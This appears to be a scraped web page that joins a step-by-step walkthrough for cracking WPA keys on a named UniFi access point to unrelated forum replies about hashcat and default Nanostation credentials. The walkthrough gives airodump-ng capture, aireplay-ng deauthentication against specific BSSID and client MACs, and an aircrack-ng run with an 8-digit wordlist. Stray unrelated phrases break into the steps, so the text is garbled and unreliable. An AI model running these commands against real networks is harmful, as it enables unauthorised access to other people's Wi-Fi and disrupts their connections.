At least 1 client connecting to the AP Before proceeding, make sure you are familiar with OK first we will need to capture the handshake between the client and AP. Our current target is wany@unifi airodump-ng --bssid 34:08:04:6D:67:A0 -w wany -c 2,2 mon0 Then, we will run a deauth attack to force the client to create a new handshake. Aireplay-ng --ig -0 5 -a 34:08:04:6D:67:A0 -c 00:21:6A:57:61:DA mon0 If the deauth is succesfull, a WPA handshake session will appear on the top right column of airodump. Game maker spaceship engine names. The fashion show ultimate collection. Stop capturing and run aircrack-ng to crack the password. Since default UniFi APs only generate random keys of 8 digits, we can easily crack it using a list of digits from 00000000 to 99999999 You can get my generated wordlist here FILE: MD5:BF22FA2059C7550FC548CF63D3E31781 PASS:hmsec!@# aircrack-ng wany-01.cap -w /media/Hacking/WPAWlist/unifi/unifi10m And there you have it!
Hashcat (and oclHashCat) can be used to crack the PSK used based on treating a captured 4-way handshake from the start of a session as if it were a form of 'hash'. It's not a hash, just like the PSK isn't a password, but you can work through the exchanges with your assumed PSK. This is the UniFi forum and I assumed you were asking about determining the admin password for the UniFi controller. In your case, you are going to have to do a hard reset of those Nanostations. Once reset, the IP address will be 192.168.1.20 with a user ID and password of ubnt/ubnt.